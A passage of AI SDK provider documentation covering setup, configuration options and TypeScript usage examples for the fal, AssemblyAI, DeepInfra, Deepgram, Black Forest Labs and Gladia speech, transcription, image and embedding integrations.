| fal-ai/minimax/speech-02-turbo | Generate fast speech from text prompts and different voices |
| fal-ai/dia-tts | Directly generates realistic dialogue from transcripts with audio conditioning for emotion control. Produces natural nonverbals like laughter and throat clearing |
| resemble-ai/chatterboxhd/text-to-speech | Generate expressive, natural speech with Resemble AI's Chatterbox. Features unique emotion control, instant voice cloning from short audio, and built-in watermarking |
Provider Options
Pass provider-specific options via providerOptions.fal depending on the model:
- voice_setting object
  - voice_id (string): predefined voice ID
  - speed (number): 0.5 to 2.0
  - vol (number): 0 to 10
  - pitch (number): -12 to 12
  - emotion (enum): happy | sad | angry | fearful | disgusted | surprised | neutral
  - english_normalization (boolean)
- audio_setting object - Audio configuration settings specific to the model.
- language_boost enum - Chinese | Chinese,Yue | English | Arabic | Russian | Spanish | French | Portuguese | German | Turkish | Dutch | Ukrainian | Vietnamese | Indonesian | Japanese | Italian | Korean | Thai | Polish | Romanian | Greek | Czech | Finnish | Hindi | auto
- pronunciation_dict object - Custom pronunciation dictionary for specific words.
Model-specific parameters (e.g., audio_url, prompt, preview_text, ref_audio_url, ref_text) can be passed directly under providerOptions.fal and will be forwarded to the Fal API.
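For example, a minimal sketch passing a voice_setting (the voice_id value is a hypothetical placeholder; check the Fal model page for valid IDs):
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { fal } from '@ai-sdk/fal';
const result = await generateSpeech({
  model: fal.speech('fal-ai/minimax/speech-02-hd'),
  text: 'Hello from the AI SDK!',
  providerOptions: {
    fal: {
      voice_setting: {
        voice_id: 'example-voice-id', // hypothetical placeholder
        speed: 1.2,
        emotion: 'happy',
      },
      language_boost: 'English',
    },
  },
});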
title: AssemblyAI description: Learn how to use the AssemblyAI provider for the AI SDK.
AssemblyAI Provider
The AssemblyAI provider contains language model support for the AssemblyAI transcription API.
Setup
The AssemblyAI provider is available in the @ai-sdk/assemblyai module. You can install it with:
pnpm add @ai-sdk/assemblyai
Provider Instance
You can import the default provider instance assemblyai from @ai-sdk/assemblyai:
import { assemblyai } from '@ai-sdk/assemblyai';
If you need a customized setup, you can import createAssemblyAI from @ai-sdk/assemblyai and create a provider instance with your settings:
import { createAssemblyAI } from '@ai-sdk/assemblyai';
const assemblyai = createAssemblyAI({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the AssemblyAI provider instance:
- apiKey string - API key that is being sent using the Authorization header. It defaults to the ASSEMBLYAI_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the AssemblyAI transcription API
using the .transcription() factory method.
The first argument is the model id e.g. best.
const model = assemblyai.transcription('best');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the contentSafety option will enable content safety filtering.
import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { type AssemblyAITranscriptionModelOptions } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: assemblyai.transcription('best'),
audio: await readFile('audio.mp3'),
providerOptions: {
assemblyai: {
contentSafety: true,
} satisfies AssemblyAITranscriptionModelOptions,
},
});
The following provider options are available:
- audioEndAt number - End time of the audio in milliseconds. Optional.
- audioStartFrom number - Start time of the audio in milliseconds. Optional.
- autoChapters boolean - Whether to automatically generate chapters for the transcription. Optional.
- autoHighlights boolean - Whether to automatically generate highlights for the transcription. Optional.
- boostParam enum - Boost parameter for the transcription. Allowed values: 'low', 'default', 'high'. Optional.
- contentSafety boolean - Whether to enable content safety filtering. Optional.
- contentSafetyConfidence number - Confidence threshold for content safety filtering (25-100). Optional.
- customSpelling array of objects - Custom spelling rules for the transcription. Each object has from (array of strings) and to (string) properties. Optional.
- disfluencies boolean - Whether to include disfluencies (um, uh, etc.) in the transcription. Optional.
- entityDetection boolean - Whether to detect entities in the transcription. Optional.
- filterProfanity boolean - Whether to filter profanity in the transcription. Optional.
- formatText boolean - Whether to format the text in the transcription. Optional.
- iabCategories boolean - Whether to include IAB categories in the transcription. Optional.
- languageCode string - Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
- languageConfidenceThreshold number - Confidence threshold for language detection. Optional.
- languageDetection boolean - Whether to enable language detection. Optional.
- multichannel boolean - Whether to process multiple audio channels separately. Optional.
- punctuate boolean - Whether to add punctuation to the transcription. Optional.
- redactPii boolean - Whether to redact personally identifiable information. Optional.
- redactPiiAudio boolean - Whether to redact PII in the audio file. Optional.
- redactPiiAudioQuality enum - Quality of the redacted audio file. Allowed values: 'mp3', 'wav'. Optional.
- redactPiiPolicies array of enums - Policies for PII redaction, specifying which types of information to redact. Supports numerous types like 'person_name', 'phone_number', etc. Optional.
- redactPiiSub enum - Substitution method for redacted PII. Allowed values: 'entity_name', 'hash'. Optional.
- sentimentAnalysis boolean - Whether to perform sentiment analysis on the transcription. Optional.
- speakerLabels boolean - Whether to label different speakers in the transcription. Optional.
- speakersExpected number - Expected number of speakers in the audio. Optional.
- speechThreshold number - Threshold for speech detection (0-1). Optional.
- summarization boolean - Whether to generate a summary of the transcription. Optional.
- summaryModel enum - Model to use for summarization. Allowed values: 'informative', 'conversational', 'catchy'. Optional.
- summaryType enum - Type of summary to generate. Allowed values: 'bullets', 'bullets_verbose', 'gist', 'headline', 'paragraph'. Optional.
- webhookAuthHeaderName string - Name of the authentication header for webhook requests. Optional.
- webhookAuthHeaderValue string - Value of the authentication header for webhook requests. Optional.
- webhookUrl string - URL to send webhook notifications to. Optional.
- wordBoost array of strings - List of words to boost in the transcription. Optional.
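Several of these options can be combined in a single request; a minimal sketch using the options above:
import { experimental_transcribe as transcribe } from 'ai';
import {
  assemblyai,
  type AssemblyAITranscriptionModelOptions,
} from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: assemblyai.transcription('best'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    assemblyai: {
      speakerLabels: true, // label different speakers
      speakersExpected: 2,
      summarization: true,
      summaryType: 'bullets',
    } satisfies AssemblyAITranscriptionModelOptions,
  },
});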
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| best | | | | |
| nano | | | | |
title: DeepInfra description: Learn how to use DeepInfra's models with the AI SDK.
DeepInfra Provider
The DeepInfra provider contains support for state-of-the-art models through the DeepInfra API, including Llama 3, Mixtral, Qwen, and many other popular open-source models.
Setup
The DeepInfra provider is available via the @ai-sdk/deepinfra module. You can install it with:
pnpm add @ai-sdk/deepinfra
Provider Instance
You can import the default provider instance deepinfra from @ai-sdk/deepinfra:
import { deepinfra } from '@ai-sdk/deepinfra';
If you need a customized setup, you can import createDeepInfra from @ai-sdk/deepinfra and create a provider instance with your settings:
import { createDeepInfra } from '@ai-sdk/deepinfra';
const deepinfra = createDeepInfra({
apiKey: process.env.DEEPINFRA_API_KEY ?? '',
});
You can use the following optional settings to customize the DeepInfra provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.deepinfra.com/v1. Note: Language models and embeddings use OpenAI-compatible endpoints at {baseURL}/openai, while image models use {baseURL}/inference.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the DEEPINFRA_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create language models using a provider instance. The first argument is the model ID, for example:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
DeepInfra language models can also be used in the streamText function (see AI SDK Core).
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8 | | | | |
| meta-llama/Llama-4-Scout-17B-16E-Instruct | | | | |
| meta-llama/Llama-3.3-70B-Instruct-Turbo | | | | |
| meta-llama/Llama-3.3-70B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-405B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-70B-Instruct-Turbo | | | | |
| meta-llama/Meta-Llama-3.1-70B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo | | | | |
| meta-llama/Meta-Llama-3.1-8B-Instruct | | | | |
| meta-llama/Llama-3.2-11B-Vision-Instruct | | | | |
| meta-llama/Llama-3.2-90B-Vision-Instruct | | | | |
| mistralai/Mixtral-8x7B-Instruct-v0.1 | | | | |
| deepseek-ai/DeepSeek-V3 | | | | |
| deepseek-ai/DeepSeek-R1 | | | | |
| deepseek-ai/DeepSeek-R1-Distill-Llama-70B | | | | |
| deepseek-ai/DeepSeek-R1-Turbo | | | | |
| nvidia/Llama-3.1-Nemotron-70B-Instruct | | | | |
| Qwen/Qwen2-7B-Instruct | | | | |
| Qwen/Qwen2.5-72B-Instruct | | | | |
| Qwen/Qwen2.5-Coder-32B-Instruct | | | | |
| Qwen/QwQ-32B-Preview | | | | |
| google/codegemma-7b-it | | | | |
| google/gemma-2-9b-it | | | | |
| microsoft/WizardLM-2-8x22B | | | | |
Image Models
You can create DeepInfra image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: deepinfra.image('stabilityai/sd3.5'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Model-specific options
You can pass model-specific parameters using the providerOptions.deepinfra field:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: deepinfra.image('stabilityai/sd3.5'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
providerOptions: {
deepinfra: {
num_inference_steps: 30, // Control the number of denoising steps (1-50)
},
},
});
Image Editing
DeepInfra supports image editing through models like Qwen/Qwen-Image-Edit. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import { readFileSync } from 'node:fs';
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: deepinfra.image('Qwen/Qwen-Image-Edit'),
prompt: {
text: 'Turn the cat into a golden retriever dog',
images: [imageBuffer],
},
size: '1024x1024',
});
Inpainting with Mask
Edit specific parts of an image using a mask. Transparent areas in the mask indicate where the image should be edited:
const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png');
const { images } = await generateImage({
model: deepinfra.image('Qwen/Qwen-Image-Edit'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask: mask,
},
});
Multi-Image Combining
Combine multiple reference images into a single output:
const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');
const { images } = await generateImage({
model: deepinfra.image('Qwen/Qwen-Image-Edit'),
prompt: {
text: 'Create a scene with both animals together, playing as friends',
images: [cat, dog],
},
});
Model Capabilities
For models supporting aspect ratios, the following ratios are typically supported:
1:1 (default), 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
For models supporting size parameters, dimensions must typically be:
- Multiples of 32
- Width and height between 256 and 1440 pixels
- Default size is 1024x1024
| Model | Dimensions Specification | Notes |
|---|---|---|
| stabilityai/sd3.5 | Aspect Ratio | Premium quality base model, 8B parameters |
| black-forest-labs/FLUX-1.1-pro | Size | Latest state-of-art model with superior prompt following |
| black-forest-labs/FLUX-1-schnell | Size | Fast generation in 1-4 steps |
| black-forest-labs/FLUX-1-dev | Size | Optimized for anatomical accuracy |
| black-forest-labs/FLUX-pro | Size | Flagship Flux model |
| black-forest-labs/FLUX.1-Kontext-dev | Size | Image editing and transformation model |
| black-forest-labs/FLUX.1-Kontext-pro | Size | Professional image editing and transformation |
| stabilityai/sd3.5-medium | Aspect Ratio | Balanced 2.5B parameter model |
| stabilityai/sdxl-turbo | Aspect Ratio | Optimized for fast generation |
For more details and pricing information, see the DeepInfra text-to-image models page.
Embedding Models
You can create DeepInfra embedding models using the .embeddingModel() factory method.
For more on embedding models with the AI SDK see embed().
import { deepinfra } from '@ai-sdk/deepinfra';
import { embed } from 'ai';
const { embedding } = await embed({
model: deepinfra.embeddingModel('BAAI/bge-large-en-v1.5'),
value: 'sunny day at the beach',
});
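To embed several values in one call, the AI SDK's embedMany function can be used the same way; a brief sketch:
import { deepinfra } from '@ai-sdk/deepinfra';
import { embedMany } from 'ai';
const { embeddings } = await embedMany({
  model: deepinfra.embeddingModel('BAAI/bge-large-en-v1.5'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});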
Model Capabilities
| Model | Dimensions | Max Tokens |
|---|---|---|
| BAAI/bge-base-en-v1.5 | 768 | 512 |
| BAAI/bge-large-en-v1.5 | 1024 | 512 |
| BAAI/bge-m3 | 1024 | 8192 |
| intfloat/e5-base-v2 | 768 | 512 |
| intfloat/e5-large-v2 | 1024 | 512 |
| intfloat/multilingual-e5-large | 1024 | 512 |
| sentence-transformers/all-MiniLM-L12-v2 | 384 | 256 |
| sentence-transformers/all-MiniLM-L6-v2 | 384 | 256 |
| sentence-transformers/all-mpnet-base-v2 | 768 | 384 |
| sentence-transformers/clip-ViT-B-32 | 512 | 77 |
| sentence-transformers/clip-ViT-B-32-multilingual-v1 | 512 | 77 |
| sentence-transformers/multi-qa-mpnet-base-dot-v1 | 768 | 512 |
| sentence-transformers/paraphrase-MiniLM-L6-v2 | 384 | 128 |
| shibing624/text2vec-base-chinese | 768 | 512 |
| thenlper/gte-base | 768 | 512 |
| thenlper/gte-large | 1024 | 512 |
title: Deepgram description: Learn how to use the Deepgram provider for the AI SDK.
Deepgram Provider
The Deepgram provider contains language model support for the Deepgram transcription and speech generation APIs.
Setup
The Deepgram provider is available in the @ai-sdk/deepgram module. You can install it with:
pnpm add @ai-sdk/deepgram
Provider Instance
You can import the default provider instance deepgram from @ai-sdk/deepgram:
import { deepgram } from '@ai-sdk/deepgram';
If you need a customized setup, you can import createDeepgram from @ai-sdk/deepgram and create a provider instance with your settings:
import { createDeepgram } from '@ai-sdk/deepgram';
const deepgram = createDeepgram({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Deepgram provider instance:
- apiKey string - API key that is being sent using the Authorization header. It defaults to the DEEPGRAM_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the Deepgram text-to-speech API
using the .speech() factory method.
The first argument is the model id, which includes the voice. Deepgram embeds the voice directly in the model ID (e.g., aura-2-helena-en).
const model = deepgram.speech('aura-2-helena-en');
You can use the model with the generateSpeech function:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';
const result = await generateSpeech({
model: deepgram.speech('aura-2-helena-en'),
text: 'Hello, world!',
});
You can also pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { deepgram, type DeepgramSpeechModelOptions } from '@ai-sdk/deepgram';
const result = await generateSpeech({
model: deepgram.speech('aura-2-helena-en'),
text: 'Hello, world!',
providerOptions: {
deepgram: {
encoding: 'linear16',
sampleRate: 24000,
} satisfies DeepgramSpeechModelOptions,
},
});
The following provider options are available:
- encoding string - Encoding type for the audio output. Supported values: 'linear16', 'mulaw', 'alaw', 'mp3', 'opus', 'flac', 'aac'. Optional.
- container string - Container format for the output audio. Supported values: 'wav', 'ogg', 'none'. Optional.
- sampleRate number - Sample rate for the output audio in Hz. Supported values depend on the encoding: 8000, 16000, 24000, 32000, 48000. Optional.
- bitRate number | string - Bitrate of the audio in bits per second. For mp3: 32000 or 48000. For opus: 4000 to 650000. For aac: 4000 to 192000. Optional.
- callback string - URL to which Deepgram will make a callback request with the audio. Optional.
- callbackMethod enum - HTTP method for the callback request. Allowed values: 'POST', 'PUT'. Optional.
- mipOptOut boolean - Opts out requests from the Deepgram Model Improvement Program. Optional.
- tag string | array of strings - Label your requests for identification during usage reporting. Optional.
Model Capabilities
| Model |
|---|
| aura-2-asteria-en |
| aura-2-thalia-en |
| aura-2-helena-en |
| aura-2-orpheus-en |
| aura-2-zeus-en |
| aura-asteria-en |
| aura-luna-en |
| aura-stella-en |
| + more voices |
Transcription Models
You can create models that call the Deepgram transcription API
using the .transcription() factory method.
The first argument is the model id e.g. nova-3.
const model = deepgram.transcription('nova-3');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.
import { experimental_transcribe as transcribe } from 'ai';
import {
deepgram,
type DeepgramTranscriptionModelOptions,
} from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: deepgram.transcription('nova-3'),
audio: await readFile('audio.mp3'),
providerOptions: {
deepgram: {
summarize: true,
} satisfies DeepgramTranscriptionModelOptions,
},
});
The following provider options are available:
- language string - Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
- detectLanguage boolean - Whether to enable automatic language detection. When true, Deepgram will detect the language of the audio. Optional.
- smartFormat boolean - Whether to apply smart formatting to the transcription. Optional.
- punctuate boolean - Whether to add punctuation to the transcription. Optional.
- summarize enum | boolean - Whether to generate a summary of the transcription. Allowed values: 'v2', false. Optional.
- topics boolean - Whether to detect topics in the transcription. Optional.
- detectEntities boolean - Whether to detect entities in the transcription. Optional.
- redact string | array of strings - Specifies what content to redact from the transcription. Optional.
- search string - Search term to find in the transcription. Optional.
- diarize boolean - Whether to identify different speakers in the transcription. Defaults to true. Optional.
- utterances boolean - Whether to segment the transcription into utterances. Optional.
- uttSplit number - Threshold for splitting utterances. Optional.
- fillerWords boolean - Whether to include filler words (um, uh, etc.) in the transcription. Optional.
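Several of these options can be combined; a minimal sketch based on the options above:
import { experimental_transcribe as transcribe } from 'ai';
import {
  deepgram,
  type DeepgramTranscriptionModelOptions,
} from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: deepgram.transcription('nova-3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    deepgram: {
      smartFormat: true,
      diarize: true, // identify different speakers
      utterances: true,
    } satisfies DeepgramTranscriptionModelOptions,
  },
});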
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| nova-3 (+ variants) | | | | |
| nova-2 (+ variants) | | | | |
| nova (+ variants) | | | | |
| enhanced (+ variants) | | | | |
| base (+ variants) | | | | |
title: Black Forest Labs description: Learn how to use Black Forest Labs models with the AI SDK.
Black Forest Labs Provider
Black Forest Labs provides a generative image platform for developers with FLUX-based models. Their platform offers fast, high quality, and in-context image generation and editing with precise and coherent results.
Setup
The Black Forest Labs provider is available via the @ai-sdk/black-forest-labs module. You can install it with:
pnpm add @ai-sdk/black-forest-labs
Provider Instance
You can import the default provider instance blackForestLabs from @ai-sdk/black-forest-labs:
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
If you need a customized setup, you can import createBlackForestLabs and create a provider instance with your settings:
import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';
const blackForestLabs = createBlackForestLabs({
apiKey: 'your-api-key', // optional, defaults to BFL_API_KEY environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Black Forest Labs provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use a regional endpoint. The default prefix is https://api.bfl.ai/v1.
- apiKey string - API key that is being sent using the x-key header. It defaults to the BFL_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- pollIntervalMillis number - Interval in milliseconds between polling attempts when waiting for image generation to complete. Defaults to 500ms.
- pollTimeoutMillis number - Overall timeout in milliseconds for polling before giving up. Defaults to 60000ms (60 seconds).
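For example, to poll less aggressively for long-running generations, a minimal sketch (the values are illustrative):
import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';
const blackForestLabs = createBlackForestLabs({
  pollIntervalMillis: 1000, // poll once per second
  pollTimeoutMillis: 120000, // give up after two minutes
});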
Image Models
You can create Black Forest Labs image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { writeFileSync } from 'node:fs';
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: blackForestLabs.image('flux-pro-1.1'),
prompt: 'A serene mountain landscape at sunset',
});
const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Model Capabilities
Black Forest Labs offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Black Forest Labs Models Page.
| Model | Description |
|---|---|
| flux-kontext-pro | FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations |
| flux-kontext-max | FLUX.1 Kontext [max] with improved prompt adherence and typography generation |
| flux-pro-1.1-ultra | Ultra-fast, ultra high-resolution image creation |
| flux-pro-1.1 | Fast, high-quality image generation from text |
| flux-pro-1.0-fill | Inpainting model for filling masked regions of images with new content |
Black Forest Labs models support aspect ratios from 3:7 (portrait) to 7:3 (landscape).
Image Editing
Black Forest Labs Kontext models support powerful image editing capabilities using reference images. Pass input images via prompt.images to transform, combine, or edit existing images.
Single Image Editing
Transform an existing image using text prompts:
import {
blackForestLabs,
BlackForestLabsImageModelOptions,
} from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: blackForestLabs.image('flux-kontext-pro'),
prompt: {
text: 'A baby elephant with a shirt that has the logo from the input image.',
images: [
'https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png',
],
},
providerOptions: {
blackForestLabs: {
width: 1024,
height: 768,
} satisfies BlackForestLabsImageModelOptions,
},
});
Multi-Reference Editing
Combine multiple reference images for complex transformations. Black Forest Labs supports up to 10 input images:
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: blackForestLabs.image('flux-kontext-pro'),
prompt: {
text: 'Combine the style of image 1 with the subject of image 2',
images: [
'https://example.com/style-reference.jpg',
'https://example.com/subject-reference.jpg',
],
},
});
Inpainting
The flux-pro-1.0-fill model supports inpainting, which allows you to fill masked regions of an image with new content. Pass the source image via prompt.images and a mask image via prompt.mask:
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: blackForestLabs.image('flux-pro-1.0-fill'),
prompt: {
text: 'A beautiful garden with flowers',
images: ['https://example.com/source-image.jpg'],
mask: 'https://example.com/mask-image.png',
},
});
The mask image should be a grayscale image where white areas indicate regions to be filled and black areas indicate regions to preserve.
Provider Options
Black Forest Labs image models support flexible provider options through the providerOptions.blackForestLabs object. The supported parameters depend on the used model ID:
- width number - Output width in pixels (256-1920). When set, this overrides any width derived from size.
- height number - Output height in pixels (256-1920). When set, this overrides any height derived from size.
- outputFormat string - Desired format of the output image ("jpeg" or "png").
- steps number - Number of inference steps. Higher values may improve quality but increase generation time.
- guidance number - Guidance scale for generation. Higher values follow the prompt more closely.
- imagePrompt string - Base64-encoded image to use as additional visual context for generation.
- imagePromptStrength number - Strength of the image prompt influence on generation (0.0 to 1.0).
- promptUpsampling boolean - If true, performs upsampling on the prompt.
- raw boolean - Enable raw mode for more natural, authentic aesthetics.
- safetyTolerance number - Moderation level for inputs and outputs (0 = most strict, 6 = most permissive).
- pollIntervalMillis number - Interval in milliseconds between polling attempts (default 500ms).
- pollTimeoutMillis number - Overall timeout in milliseconds for polling before timing out (default 60s).
- webhookUrl string - URL for asynchronous completion notification. Must be a valid HTTP/HTTPS URL.
- webhookSecret string - Secret for webhook signature verification, sent in the X-Webhook-Secret header.
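A minimal sketch combining a few of these options (the values are illustrative):
import {
  blackForestLabs,
  type BlackForestLabsImageModelOptions,
} from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { image } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.1'),
  prompt: 'A serene mountain landscape at sunset',
  providerOptions: {
    blackForestLabs: {
      width: 1440,
      height: 768,
      outputFormat: 'png',
      promptUpsampling: true,
    } satisfies BlackForestLabsImageModelOptions,
  },
});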
Provider Metadata
The generateImage response includes provider-specific metadata in providerMetadata.blackForestLabs.images[]. Each image object may contain the following properties:
- seed number - The seed used for generation. Useful for reproducing results.
- start_time number - Unix timestamp when generation started.
- end_time number - Unix timestamp when generation completed.
- duration number - Generation duration in seconds.
- cost number - Cost of the generation request.
- inputMegapixels number - Input image size in megapixels.
- outputMegapixels number - Output image size in megapixels.
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: blackForestLabs.image('flux-pro-1.1'),
prompt: 'A serene mountain landscape at sunset',
});
// Access provider metadata
const metadata = providerMetadata?.blackForestLabs?.images?.[0];
console.log('Seed:', metadata?.seed);
console.log('Cost:', metadata?.cost);
console.log('Duration:', metadata?.duration);
Regional Endpoints
By default, requests are sent to https://api.bfl.ai/v1. You can select a regional endpoint by setting baseURL when creating the provider instance:
import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';
const blackForestLabs = createBlackForestLabs({
baseURL: 'https://api.eu.bfl.ai/v1', // or https://api.us.bfl.ai/v1
});
title: Gladia description: Learn how to use the Gladia provider for the AI SDK.
Gladia Provider
The Gladia provider contains language model support for the Gladia transcription API.
Setup
The Gladia provider is available in the @ai-sdk/gladia module. You can install it with:
pnpm add @ai-sdk/gladia
Provider Instance
You can import the default provider instance gladia from @ai-sdk/gladia:
import { gladia } from '@ai-sdk/gladia';
If you need a customized setup, you can import createGladia from @ai-sdk/gladia and create a provider instance with your settings:
import { createGladia } from '@ai-sdk/gladia';
const gladia = createGladia({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Gladia provider instance:
- apiKey string - API key that is being sent using the Authorization header. It defaults to the GLADIA_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the Gladia transcription API
using the .transcription() factory method.
const model = gladia.transcription();
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.
import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { type GladiaTranscriptionModelOptions } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: gladia.transcription(),
audio: await readFile('audio.mp3'),
providerOptions: {
gladia: {
summarization: true,
} satisfies GladiaTranscriptionModelOptions,
},
});
The following provider options are available:
- contextPrompt string - Context to feed the transcription model with for possible better accuracy. Optional.
- customVocabulary boolean | any[] - Custom vocabulary to improve transcription accuracy. Optional.
- customVocabularyConfig object - Configuration for custom vocabulary. Optional.
  - vocabulary Array<string | { value: string, intensity?: number, pronunciations?: string[], language?: string }>
  - defaultIntensity number
- detectLanguage boolean - Whether to automatically detect the language. Optional.
- enableCodeSwitching boolean - Enable code switching for multilingual audio. Optional.
- codeSwitchingConfig object - Configuration for code switching. Optional.
  - languages string[]
- language string - Specify the language of the audio. Optional.
- callback boolean - Enable callback when transcription is complete. Optional.
- callbackConfig object - Configuration for callback. Optional.
  - url string
  - method 'POST' | 'PUT'
- subtitles boolean - Generate subtitles from the transcription. Optional.
- subtitlesConfig object - Configuration for subtitles. Optional.
  - formats Array<'srt' | 'vtt'>
  - minimumDuration number
  - maximumDuration number
  - maximumCharactersPerRow number
  - maximumRowsPerCaption number
  - style 'default' | 'compliance'
- diarization boolean - Enable speaker diarization. Optional.
- diarizationConfig object - Configuration for diarization. Optional.
  - numberOfSpeakers number
  - minSpeakers number
  - maxSpeakers number
  - enhanced boolean
- translation boolean - Enable translation of the transcription. Optional.
- translationConfig object - Configuration for translation. Optional.
  - targetLanguages string[]
  - model 'base' | 'enhanced'
  - matchOriginalUtterances boolean
- summarization boolean - Enable summarization of the transcription. Optional.
- summarizationConfig object - Configuration for summarization. Optional.
  - type 'general' | 'bullet_points' | 'concise'
- moderation boolean - Enable content moderation. Optional.
- namedEntityRecognition boolean - Enable named entity recognition. Optional.
- chapterization boolean - Enable chapterization of the transcription. Optional.
- nameConsistency boolean - Enable name consistency in the transcription. Optional.
- customSpelling boolean - Enable custom spelling. Optional.
- customSpellingConfig object - Configuration for custom spelling. Optional.
  - spellingDictionary Record<string, string[]>
- structuredDataExtraction boolean - Enable structured data extraction. Optional.
- structuredDataExtractionConfig object - Configuration for structured data extraction. Optional.
  - classes string[]
- sentimentAnalysis boolean - Enable sentiment analysis. Optional.
- audioToLlm boolean - Enable audio to LLM processing. Optional.
- audioToLlmConfig object - Configuration for audio to LLM. Optional.
  - prompts string[]
- customMetadata Record<string, any> - Custom metadata to include with the request. Optional.
- sentences boolean - Enable sentence detection. Optional.
- displayMode boolean - Enable display mode. Optional.
- punctuationEnhanced boolean - Enable enhanced punctuation. Optional.
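Nested configuration objects are passed alongside their boolean flags; a minimal sketch based on the options above:
import { experimental_transcribe as transcribe } from 'ai';
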